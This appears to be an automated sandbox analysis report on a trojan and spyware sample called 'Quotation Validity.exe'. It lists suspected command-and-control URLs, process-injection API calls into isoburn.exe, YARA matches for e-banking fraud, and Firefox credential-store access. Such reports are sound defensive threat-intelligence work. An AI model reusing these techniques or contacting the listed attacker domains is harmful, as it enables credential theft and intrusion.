                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:45:59 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:46:01 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:46:04 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Mon, 02 Dec 2024 13:46:11 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Mon, 02 Dec 2024 13:46:14 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Mon, 02 Dec 2024 13:46:16 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Mon, 02 Dec 2024 13:46:19 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 203 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Mon, 02 Dec 2024 13:46:27 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Mon, 02 Dec 2024 13:46:29 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Mon, 02 Dec 2024 13:46:32 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Mon, 02 Dec 2024 13:46:35 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3732486817.0000000002F48000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3734770459.0000000004CE7000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.smartcongress.net
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3734770459.0000000004CE7000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.smartcongress.net/qtfx/
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: Quotation Validity.exe | String found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: isoburn.exe, 0000000C.00000003.1891343530.0000000003141000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                      Source: isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1891343530.0000000003141000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: isoburn.exe, 0000000C.00000003.1889442432.00000000080B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: isoburn.exe, 0000000C.00000002.3733320595.00000000059D6000.00000004.10000000.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000002.3732486817.0000000002DB6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.cstrategy.online/qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      Source: Yara match | File source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: initial sample | Static PE information: Filename: Quotation Validity.exe
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_0042C663 NtClose,9_2_0042C663
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B35C0 NtCreateMutant,LdrInitializeThunk,9_2_013B35C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2B60 NtClose,LdrInitializeThunk,9_2_013B2B60
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_013B2DF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_013B2C70
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B3010 NtOpenDirectoryObject,9_2_013B3010
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B3090 NtSetValueKey,9_2_013B3090
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B4340 NtSetContextThread,9_2_013B4340
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B4650 NtSuspendThread,9_2_013B4650
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B39B0 NtGetContextThread,9_2_013B39B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2BA0 NtEnumerateValueKey,9_2_013B2BA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2B80 NtQueryInformationFile,9_2_013B2B80
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2BF0 NtAllocateVirtualMemory,9_2_013B2BF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2BE0 NtQueryValueKey,9_2_013B2BE0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2AB0 NtWaitForSingleObject,9_2_013B2AB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2AF0 NtWriteFile,9_2_013B2AF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2AD0 NtReadFile,9_2_013B2AD0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2D30 NtUnmapViewOfSection,9_2_013B2D30
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2D10 NtMapViewOfSection,9_2_013B2D10
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B3D10 NtOpenProcessToken,9_2_013B3D10
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2D00 NtSetInformationFile,9_2_013B2D00
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B3D70 NtOpenThread,9_2_013B3D70
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2DB0 NtEnumerateKey,9_2_013B2DB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2DD0 NtDelayExecution,9_2_013B2DD0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2C00 NtQueryInformationProcess,9_2_013B2C00
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2C60 NtCreateKey,9_2_013B2C60
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2CA0 NtQueryInformationToken,9_2_013B2CA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2CF0 NtOpenProcess,9_2_013B2CF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2CC0 NtQueryVirtualMemory,9_2_013B2CC0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2F30 NtCreateSection,9_2_013B2F30
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2F60 NtCreateProcessEx,9_2_013B2F60
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2FB0 NtResumeThread,9_2_013B2FB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2FA0 NtQuerySection,9_2_013B2FA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2F90 NtProtectVirtualMemory,9_2_013B2F90
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2FE0 NtCreateFile,9_2_013B2FE0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2E30 NtWriteVirtualMemory,9_2_013B2E30
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2EA0 NtAdjustPrivilegesToken,9_2_013B2EA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2E80 NtReadVirtualMemory,9_2_013B2E80
                      Source: C:\Users\user\Desktop\Quotation Validity.exe | Code function: 9_2_013B2EE0 NtQueueApcThread,9_2_013B2EE0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA35C0 NtCreateMutant,LdrInitializeThunk,12_2_04EA35C0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA4650 NtSuspendThread,LdrInitializeThunk,12_2_04EA4650
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA4340 NtSetContextThread,LdrInitializeThunk,12_2_04EA4340
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04EA2CA0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2C60 NtCreateKey,LdrInitializeThunk,12_2_04EA2C60
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04EA2C70
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04EA2DF0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2DD0 NtDelayExecution,LdrInitializeThunk,12_2_04EA2DD0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04EA2D30
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04EA2D10
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04EA2EE0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04EA2E80
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2FE0 NtCreateFile,LdrInitializeThunk,12_2_04EA2FE0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2FB0 NtResumeThread,LdrInitializeThunk,12_2_04EA2FB0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2F30 NtCreateSection,LdrInitializeThunk,12_2_04EA2F30
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA39B0 NtGetContextThread,LdrInitializeThunk,12_2_04EA39B0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2AF0 NtWriteFile,LdrInitializeThunk,12_2_04EA2AF0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2AD0 NtReadFile,LdrInitializeThunk,12_2_04EA2AD0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04EA2BE0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04EA2BF0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04EA2BA0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2B60 NtClose,LdrInitializeThunk,12_2_04EA2B60
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA3090 NtSetValueKey,12_2_04EA3090
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA3010 NtOpenDirectoryObject,12_2_04EA3010
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2CF0 NtOpenProcess,12_2_04EA2CF0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2CC0 NtQueryVirtualMemory,12_2_04EA2CC0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2C00 NtQueryInformationProcess,12_2_04EA2C00
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2DB0 NtEnumerateKey,12_2_04EA2DB0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA3D70 NtOpenThread,12_2_04EA3D70
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2D00 NtSetInformationFile,12_2_04EA2D00
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA3D10 NtOpenProcessToken,12_2_04EA3D10
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2EA0 NtAdjustPrivilegesToken,12_2_04EA2EA0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2E30 NtWriteVirtualMemory,12_2_04EA2E30
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2FA0 NtQuerySection,12_2_04EA2FA0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2F90 NtProtectVirtualMemory,12_2_04EA2F90
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2F60 NtCreateProcessEx,12_2_04EA2F60
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2AB0 NtWaitForSingleObject,12_2_04EA2AB0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_04EA2B80 NtQueryInformationFile,12_2_04EA2B80
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_02A69210 NtReadFile,12_2_02A69210
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_02A693A0 NtClose,12_2_02A693A0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_02A69300 NtDeleteFile,12_2_02A69300
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_02A690A0 NtCreateFile,12_2_02A690A0
                      Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 12_2_02A69510 NtAllocateVirtualMemory,12_2_02A69510
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 0136B970 appears 271 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013B5130 appears 36 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013EEA12 appears 86 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013C7E54 appears 89 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013FF290 appears 105 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04E5B970 appears 275 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EB7E54 appears 95 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EDEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EEF290 appears 105 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EA5130 appears 36 times
                      Source: Quotation Validity.exe, 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1307325676.0000000007800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1301683641.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000000.1266184725.0000000000FBE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWlUx.exeF vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000009.00000002.1699227105.000000000146D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation Validity.exe
                      Source: Quotation Validity.exeBinary or memory string: OriginalFilenameWlUx.exeF vs Quotation Validity.exe
                      Source: Quotation Validity.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation Validity.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.AddAccessRule
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, gaISc3smJkRod0afuE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, gaISc3smJkRod0afuE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@19/12
                      Source: C:\Users\user\Desktop\Quotation Validity.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation Validity.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\l420377xJump to behavior
                      Source: Quotation Validity.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: isoburn.exe, 0000000C.00000003.1891302974.0000000003155000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1892342599.0000000003176000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003180000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Quotation Validity.exeReversingLabs: Detection: 68%
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: cryptsp.dllJump to behavior
